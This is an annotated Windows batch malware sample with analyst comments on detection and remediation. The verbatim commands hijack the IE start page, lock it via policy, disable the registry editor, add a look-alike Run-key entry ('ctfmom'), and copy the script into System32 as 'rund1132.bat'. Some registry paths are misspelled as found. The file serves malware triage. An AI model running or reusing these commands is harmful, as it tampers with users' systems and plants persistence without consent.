该病毒修改IE主页为https://www.baidu.com,并将其加入到注册表项,然后禁用注册表编辑器,同时将病毒程序加入开机启动项,最后将病毒样本复制到了系统目录system32下
@echo off
rem Analyst annotations only -- the sample's commands below are left byte-for-byte as found.
rem Summary: four HKCU registry writes (IE start page, IE home-page lock, registry-editor
rem disable, Run-key persistence) followed by a self-copy into System32.

rem 1. Sets the current user's IE start page to https://www.baidu.com.
rem    Detection: modification of HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
rem    by a cmd.exe / .bat process.
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "https://www.baidu.com" /f
rem 2. Writes HomePage=1 (REG_DWORD) under an IE Control Panel policy path, intended to lock
rem    the home page. Note the key path exactly as spelled on this line ("...\Polices\...");
rem    whether Windows honors this path should be confirmed on an infected host before rating impact.
reg add "HKCU\Software\Polices\Microsoft\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
rem 3. Writes DisableRegistryTools=1 (REG_DWORD), intended to block regedit for the user.
rem    Same caveat: the key path is spelled "...\Polices\System" here -- verify effect on-host.
rem    Remediation: delete this value (or set to 0) from an elevated shell or via GPO.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
rem 4. Persistence via HKCU\...\CurrentVersion\Run. Value name "ctfmom" is a look-alike of the
rem    legitimate ctfmon; the value data is written verbatim as it appears on this line.
rem    Detection: any Run value whose data ends in a .bat inside System32.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "&winddir%\System32\rund1132.bat" /f
rem 5. Self-copy: %0 is the running script's own path; the destination name "rund1132.bat"
rem    is a look-alike of rundll32. Writing into System32 normally requires elevation --
rem    presumably the sample is run from an elevated context; confirm during triage.
rem    IoC to check: %windir%\System32\rund1132.bat (a .bat in System32 is abnormal).
copy %0 %windir%\System32\rund1132.bat